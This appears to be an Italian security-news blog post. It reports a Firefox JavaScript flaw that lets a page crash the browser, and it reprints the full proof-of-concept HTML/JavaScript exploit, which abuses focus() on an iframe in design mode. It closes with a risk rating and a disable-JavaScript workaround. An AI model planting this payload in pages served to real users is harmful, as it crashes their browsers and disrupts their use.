Scoperta una nuova vulnerabilità in Firefox che può essere sfruttata per un attacco DoS. Come al solito, il problema risiede nell’interprete Javascript che, in questo caso, causa il crash del browser settando il contenuto attivo da una textarea ad un iframe mediante la funzione focus().

Codice Exploit: (fonte: Securident)

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
  <script>
       var textarea = document.getElementsByName("x_OtherInfo");
       textarea=textarea.item(0);
           var htmlarea = document.createElement("div");
       htmlarea.className = "htmlarea"; 
       textarea.parentNode.insertBefore(htmlarea, textarea);
       var iframe = document.createElement("iframe");
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document;
                 doc.designMode = "on";
                 doc.open();
                 doc.write("<iframe src=”>");
          iframe.contentWindow.focus()
  doc.close();
  </script>
</textarea>

Il livello di rischio secondo Secunia non è critico.

Soluzione: Al momento nessuna alternativa a parte quella di disabilitare Javascript

Fonte: Exploit

Permalink Commenti disabilitati